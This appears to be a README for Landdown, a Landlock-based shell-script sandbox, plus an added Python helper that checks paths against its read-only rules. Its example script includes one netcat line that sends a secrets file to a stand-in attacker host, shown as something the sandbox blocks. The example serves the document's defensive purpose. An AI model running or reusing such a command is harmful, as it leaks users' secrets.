Landdown – Simple sandboxing for shell scripts
Read-only clone: https://git.sr.ht/~marcc/landdown

# Landdown - Simple shell script sandbox

Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with Landlock. Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior".

To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example:

```
#!/usr/bin/env landdown
ro /bin
ro /lib
#!/bin/sh

# Following works
echo "Hi"

# Following fails
cat $HOME/my-secrets | nc exploit.com 1337
```

Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. The syntax is:

```
#!/usr/bin/env landdown
#!
```
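When reviewing a script like the one in the example, it helps to list what its header allows and test candidate paths against it. The following Python helper is an added example, not part of Landdown or its README. It assumes the header ends at the second `#!` line, interprets only the `ro <path>` form shown on this page, treats each rule as covering the whole tree beneath the path (as Landlock path rules do), and uses `/home/user/my-secrets` as a constructed stand-in for `$HOME/my-secrets`.

```python
import posixpath

# Constructed sample: the example script from the README above.
SAMPLE = """#!/usr/bin/env landdown
ro /bin
ro /lib
#!/bin/sh

# Following works
echo "Hi"

# Following fails
cat $HOME/my-secrets | nc exploit.com 1337
"""

def parse_header(text):
    """Return (ro_rules, unmodelled_lines, interpreter) for a landdown script.

    Assumption: the header runs from the landdown shebang to the next line
    starting with '#!'; only the 'ro <absolute path>' form is interpreted.
    """
    lines = text.splitlines()
    if not lines or not (lines[0].startswith("#!") and "landdown" in lines[0]):
        raise ValueError("not a landdown script")
    rules, unmodelled = [], []
    for line in lines[1:]:
        if line.startswith("#!"):
            return rules, unmodelled, line[2:].strip()
        parts = line.split()
        if len(parts) == 2 and parts[0] == "ro" and parts[1].startswith("/"):
            rules.append(posixpath.normpath(parts[1]))
        elif parts:
            unmodelled.append(line)  # rule kinds this example does not model
    raise ValueError("header has no interpreter shebang")

def readable(path, rules):
    """Lexical test: is path an allowlisted tree or beneath one?

    '..' is collapsed first; symlinks are not resolved, so this is a review
    aid and not a prediction of what the kernel will decide.
    """
    p = posixpath.normpath(path)
    return any(p == r or p.startswith(r.rstrip("/") + "/") for r in rules)

if __name__ == "__main__":
    rules, unmodelled, interpreter = parse_header(SAMPLE)
    for candidate in ("/bin/cat", "/home/user/my-secrets", "/bin/../etc/passwd"):
        print(candidate, "allowed" if readable(candidate, rules) else "denied")
```

Lines that land in `unmodelled_lines` should be read by hand, since they may grant access this helper does not account for.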